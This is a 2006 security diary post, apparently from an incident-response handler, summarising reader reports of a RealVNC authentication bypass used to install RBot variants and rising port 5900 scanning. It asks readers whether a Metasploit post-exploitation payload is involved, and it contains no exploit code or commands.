Mailbag and DShield items generate a post VNC exploitation fun question

Published: 2006-11-26
Last Updated: 2006-11-26 23:10:06 UTC
by Patrick Nolan (Version: 1)
0 comment(s)
Over the last 3 months or so Handlers have responded to a number of submissions concerning the use of an "older" vulnerability in VNC to exploit systems and install what is typically identified as RBot variants. Reports generally say something along the lines of "I've seen multiple reports from admins who have seen their systems remote controlled by a new Spybot worm via RealVNC.  They actually see the start button pushed, the Run command filled....". 

One report mentioned that "This appears to be an automated attack on this version of RealVNC.". Another says "I happened to be standing near the PC with iTunes playing and noticed it minimized and restored very quickly. That got my attention.  I noticed the VNC icon was black and within a couple of seconds the hacker clicked Start, then Run and ran (an executable).".

A number of readers have also noted and reported upticks in Port 5900 (VNC) scanning, which has certainly changed character this year, it changed character right after the vulnerability was announced, and then more noticeably in July, check out the increase in the number of reported sources for destination port 5900 at DShield.

So a question someone might have an answer for is, are the reports we're receiving, combined with the nature in the change in Port 5900 scanning, indicative of some development of Metasploit post VNC exploitation payload, ala what's described in "Post-exploitation fun in Metasploit 3.0"? All responses will be appreciated.

And thanks to everyone who submitted information.

Current Vulnerability information is at;
RealVNC Password Authentication Bypass Vulnerability

Cisco Security Response: RealVNC Remote Authentication Bypass Vulnerability

0 comment(s)


Diary Archives